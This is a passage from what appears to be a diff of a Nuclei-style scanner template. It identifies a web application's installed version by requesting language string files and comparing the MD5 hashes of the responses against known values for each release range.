"(\"14cb9143c34f3161d8fab58b87dbf27f\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"35f5c83a5ead800ce23a08178f3ddae5\" == md5(body))" + - type: dsl + name: 1.2.3 - 1.2.4 + dsl: + - "(\"0eea0796d69c5bff704940739bbe49fb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"397e9ec5fb132477b7d8e998437c4d17\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"5e131ea50a670fdcc3fcf1827e4a8109\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"f5f0b92ac71ad0430dc3765bd9f45bd2\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"ce7c932bce84abe6dfa47b885b0e6813\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"79c9b5cc4ba1236b1c61ba1f440f49f3\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"a6c42c1321cf5c253d42dbe4d5bc26a4\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"2f8579a61f6f570f7fae96b672fa8907\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"3858102270b2e03e6fe6a332147e9a4d\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"9f1b8a5728a927aa96cd1f367308bc13\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"f45b7381addf84b9a820f4b4581878fc\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"d00becc79264cf8ed80b8a09afece345\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"9f78cf645869c868d67ab0ce63e85468\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"4158ba92563bb79adc0199a94b007c89\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"1afe4b97b1b7e7b507e5ac92cf3e4e0b\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"968846b5d2a6586d136be6ea5f9449b2\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"5d903f18f5e55c6b8a52655d9ffd9fae\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"017930670b1c23c0c711bc759d4c9f65\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"ae5a6982cd8f6009eb973caa54846f95\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"bbfb55d227909e00f7c3b6871e643213\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"7f06fa18cf62d4f8071156424a00d746\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"be09f80595eee7ff2e6c03b14d46f38b\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"14b084ff4d58732b2c79a6b640bfcc6f\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"d26bf6ab0c88298dcc2513b5a45621b7\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"9667d54457f13252a50fa4796b0c6f5c\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"c1bc9a3b885db43c3c30b8d1fd1bb88f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_norwegian_bokmal.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.6.0 + dsl: + - "(\"2f88336ae9fc3866c5afa94a1ebff564\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"eaddece15103388db18ee9f7f4e75346\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"ebce2d45bf5800e9cbb6b8abaa00a3fe\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"35e677310328ba7582435f75c679d077\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"565386366c680f5e0eb1f448f12d97ac\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"5ac49566d78a0162885b795a93016e95\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"b7c2980bca7ffa10da40ba8ecbc1524e\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"d714fb6db8483375dd781ea716419eec\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"838e0ee32a837cce60e9294b871d4a10\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"6fd8ecd789c41b0f85a93daf05d585ae\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"79ee7b0f1ec06b37062e20f22d69c5ae\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"97660b6002457bb8b7176b57b9da24f4\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"bb281424767fe8389989a689c7cf5531\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"adea9fd15fea109444cf963e3aebf17b\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"8976e83ac1dce371b32e02a69db45f7b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"4464e10998b1281fb2c0141fceb7092f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"4be8a5a1b3def29826b4856c49b0e804\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"97baa3f022c9acf719a0aa787b932d3c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"e38a972813b3371c54b3615e05f1b4bc\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"0e2d82a673931517ad1997ff15327b8c\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.11.1 + dsl: + - "(\"e3c498d16cf5e390ecb9105a46eed029\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"efff104ad59b36fa530bcfb3dab944e3\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"322baadf6a6622334c7879c1e214e8c2\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"00b2a54365d64b2fc2e2a97a48b2ef68\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"d6058a8dda4ad208f948dcb295be4b4a\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"c484cc59961576c29a7cc1c0839dd7e1\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"1f84f487ea23e52920b29802baf3491e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_ukrainian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"12e069b4093823dce5a0bf5c112b1215\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"3a8b890a61450a4a94c971e392c44a87\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"cbcb2fcb695b421a79c55645051f96d8\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"5706f644a74b9a1038c0c099cc43af34\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"916b5e915f815a0af870ebd14ad824cb\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"f21b3af1735926215fe97a9cf20b2297\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"ce858913ba8dcf270635848c46823efe\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"6a2beb4b9de369d46581730810a3d9e2\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"495ca66da94715cce50d313ce907a66d\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e0968be49788f1c3f577a2c4fe3b215a\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"e3b88a3e3962fb9a3dca88410afb06d7\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"549196844a7e367e2f48fa7226449261\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c4a55823efb66e81859fb06a2bc643c9\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"591994e232d486d6d908ffc79652c151\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"c00508273829b7731be32e32ec3103b3\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"5e680b1f882f3ca749b836e24b52cd9e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"a61d9c413aca820939e0af073f66754f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"17306fbe7e51a506a07e5827f8507c89\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"caf7ee36c6c70a8db56087969402c857\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"6284d82408e33394cd96a5ff8ee3b40b\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"18834cbc6252f76be840368d8b76237d\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"1b4d5f470f93683a4242a0858c00a2a8\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"d8484f988d8c98bb0f73c4484b45fbe8\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"fbe5a4485ba63a27b31c99eb9a14a9d9\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"8df7b4a5b40c7d430ef8d613de39504f\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"ea6f113b57fbece3917aac68a5a4f41c\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"d3445626a3a4ee228273ccd63316614c\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.7.1 + dsl: + - "(\"f6a5236d49e53677e68dc43488a4c0bf\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.10.1 + dsl: + - "(\"1da1a1d1647a119a2845a1b1bcbb8a28\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"15f26c89a3ea8019e900ef66f26508df\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"2270233c0b537b5f487f7f8a4894f1c9\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"239526ecb5104f2469dafe5567ea066e\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"d649436c4706cc302d752d4f937cce2d\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"54c77cee02b9b0d9ebe73fd1ceba1313\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"8631a2b8103deeb1822e0adc63588f92\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"e32a0c7fb995eaf6c7e2c624491691a6\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"7968c3bff1d0dfcb99824f542f4348d4\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"bfa23a7815cc889be5f911f6efb81352\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"170e6b3c8d847084f1c4ffbcbf7f95fb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_swedish.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"5ec9b8ad98834cf240ea96794e0704e2\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"505b50e91800a09c2266da2554febef4\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"39cd9612fae1b1eea4cde45f36a6e4ce\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"c79200bacb1a4bfd188bf83e9e8e177c\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"47b3c29637adf11528094c97a872bd35\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"3add2e721a68106ad843d52f19248c34\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"75cad2587222e5c341b4daa68c1bba09\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"75f53a01f2e5c06fff9810e0264c57ae\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"bc05fc3657829baefaf48359ceeaf864\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"a66c0c371b9f3794eaa73f2294490ecc\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"69f6b0b9c817a16d7d17f34764251f17\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"a25b09149887009a4239bd11aab865e6\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"cae9cde4f8a88eb905f846903835d476\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"24d912b567e3f85968ad580f07a3087a\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"fc013ecc8fbcb8fd6c4b83cdcccb9a15\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"71629cc8922b25fac920018c1d5a6d3f\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"267f04cbe42b44b3ce07757fdbfa2a13\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"cf6f5b174bf1f542983d0f7d153d2f21\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"f6a29964ec24ec0fe2f3ff427605c4c7\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"5cfd01f60abf0f0dea0f0048f8b498e0\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"257a6fd7b4aaa72bca4ac44e7b2d8372\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"61e4aada319a21e27bc1d8afe36b9416\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"1732301249745f61cea291a75781de34\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"ee3a0c9c45808c1420ac6fcd351f9259\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"cce726bb55159826ae3cf84fc30ea93e\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"3e3a8069289580108da689b393e5b0cb\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"2417811f8c30e4fa5b2199aeeb9babfb\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"663f41333b64d2f957d3f6a98524d405\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.7.1 + dsl: + - "(\"f8fc7c9af0d69591fd7c2f70a927b730\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.10.1 + dsl: + - "(\"c0c28fcac12904dfd72bf267ee102e3a\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"e78ae5169f4b9b0f7350908a9711d803\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"326627995ea55f23676b0d50d8c7745e\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"6d5abcace92b7ed81f197d1462a4a6f8\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"ca4e5f41f2249c1884a56af7dc217be5\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"4c88abc4f10bcd42d87daabd0ab7b03c\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"b168af72616c18d958cd1659bfbd88ec\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"add0260f15bf5b2963dd23dd90e03043\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"b9761adb1ab2d3b1fdefbca35c85d910\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"0df3dcd3412bccf578fb36785dc4486f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"38ec02b387142d64e426ba2609564d47\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"3820343fe9fcc4951fa6db1ae3f3597d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_czech.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"672d4370ec2be2d46a8336f75fe739c8\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.5.2 + dsl: + - "(\"2d95da964aea2f1495ad21aca60dc214\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"eebf38403bdb9153dd7b10ab1c9e0ea7\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"ad7e114c4a9c6fc5177fd6c192a39949\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"8984cc08f61a41eb36f0ef3f353c020a\" == md5(body))" + - type: dsl + name: 1.3.5 - 1.3.20 + dsl: + - "(\"a716f5bf32db20e340dd28ae03e137a1\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"b1c1b65c71a013c3cb4e31bd483efda2\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"f54be642723bd360c94546fc8b4c3c4b\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"6ef2ac45da084c444ad6c5471434c93a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d8014728f9f3797fa31be2c9329c187c\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"bd8e40691fdd7a446ba4237cd8d4ef23\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"8766ee6314561ea40b71b67a485faf1e\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"ebb9c816b4838e97e931cbdf1ae60993\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"a8ca070b61f5cf63efbebf2b89aebef2\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5440b267282fb77c1a78a4b5ded2c5e2\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"be589499051adb652ed55e0beb9d7121\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"3006dce72e168a4a4f9a13e3004d6b47\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"4e41cb4f05784d640aee87dabec16130\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"2a6c83fd77fa12a450d541b7fff2d22a\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"f5cca03bf3297288fef24c1652e23b6d\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"a8edf532c1a5c2d6199b1e022bd476bf\" == md5(body))" + - type: dsl + name: 1.1.9 + dsl: + - "(\"86a96458a3dda1b8f4d429e15f400f15\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.8 + dsl: + - "(\"5b4723bd172a2d13f6f949fe705a25e7\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"fde79b380b80638cf6a8bfd930f59e0c\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"ec4b559c7e6fbe301bcce5d982528510\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"29bbf76e0b7a263b6031139efcfb3049\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f72a0580a5d2cf8613dd45594580074b\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"35c15d494242e77baf5f6e91ee356684\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"b412216e454f7b9cf09d83ee1e4f1904\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"6ebec1c0863c7d79a7b6ef7b5cae8d03\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"025eea7ac7231b10ebd1e40428b80dc7\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"4ac138e5eea1feab360c734e92b2413a\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"a7b7ba49ebf41a0e084b8af97d37fb30\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"477da0b3a628513ebb9c53d5f301c05c\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"a21717cfa1a4950f3dcf06ac8236857e\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"b8a5a027f632b562092ae65ae49bf800\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"17cde0577202eede053f626dad94cb3c\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"8e1ba1f3f210b6f63f1c48f5cad13c3f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"9004ce1e91544179e53da531f82ca778\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"5bf6333575f8523c5a5be970fabe4a8b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_portuguese_brazil.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.7.1 + dsl: + - "(\"0c1472e8a35c1f84306551bde35cc500\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"539f7011bb6d1be40522a52ba2e48532\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"614d120ab9f4507ce5265db072b0abdd\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"8e65bfd2e844855c9cb2e1af789d348b\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"4bb5cbab933dd39016e7b18077aa18f7\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"b500e9fd11b73253fd524c347e6901c8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"ea6e19648dbd193bd1963e151850781c\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"68cfed0357f7783e6aea7324cd7c0448\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"e3033f79cb35af3f4a062f4c7e80f60e\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"aff5413579f1b98eb114616867b355dc\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"e111e02b746bcf3df8f36c0e130c5be0\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"0c7b6844c2f338489e5736ecff3371a1\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b36a340763c0089281c74c0cfdc9591e\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"915044f20851a9a077840b2c648b18e6\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"ec64e4a1895b78c651fd8eb0b7ee5eca\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"1b75b9b356fa2eca9ddeb5a5aa242514\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"f014c77b8d7866d690fb70608322f4d6\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"2e7e946eca0a1c234543d80d267de173\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"c97578c9c5173151d119a9d2b972627c\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"e98621bc010af50236ce221ddebf3dd2\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"6d8d7b3d34bb1089b912535622bc7552\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"1e5d57b2b4746ee2e9001e99b86f3f53\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"be42e87196a9393c8106f609a370e6c6\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"5a334eb590aa4ac99d99598c5d58ee62\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"e0c8ff61082ce9125dfddabef0e05efd\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"849c5d98c851549baa61952a7a0db175\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"44005a8938df5049e9cfa67550086416\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.10.1 + dsl: + - "(\"07fae5faf67af19dec752f42115823ba\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"c721e997b8f2fe5e1de6f025fc8438c5\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"aa72b0a718f956cadbcd97380ec46b1d\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"402048dc5daa86b3801f702cffe3ec5c\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"1ae9d03e4a2d0253832b7a816176e4e7\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"5fb0f13259674f70b52e0306dd530464\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"7e42d67c7ecfec73a376c8e1fc1bcd5b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"316c3f103504e88490cda0cddda2a17d\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"d91862bb4fe47a480ecab7a60dd86574\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"1da8f215b239fbea25f80bb586ca131e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"53b9b2bbdcf6ccadb6becf8b94a06264\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"c9910487db266c3fb11251bb62f5fcaa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_galician.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"d1b6a952bf05974a0130f0fe3fb827a5\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"410c84484ef3d42af4dff78e5542b1f9\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"b9519587a8c98b17cfaf3578d1aec82c\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"9a513557e75e26cdf0e07aaf84b16c0b\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"8f651a595a355ad78a55a04dd5369cfa\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"b230b852bf43d67db5a74ad30216fdce\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"15ddecdfa8a470e31326030b1b8badd6\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"f83eb64a101661a56a2850b5d7ae82be\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"ca589d356a8ce8d5a6d903e965dadea0\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"3f2cd8f49228bdd86d1933e0c409e9a5\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"e1cb233c7b50918782c2887fef0c83aa\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"3f0db078ebe6a981030a3ea78d6b14fe\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"e59849894ffc8db9fa4c10a3d3a16078\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"b889b44168b6dac015b1bf882d96d75a\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"c396bebc30c690f9f3d2492ea9331136\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"c38dc6a28682f0f8be4b0d794062b560\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"3f4870252793dd4ad4ee7de5aed4100b\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - 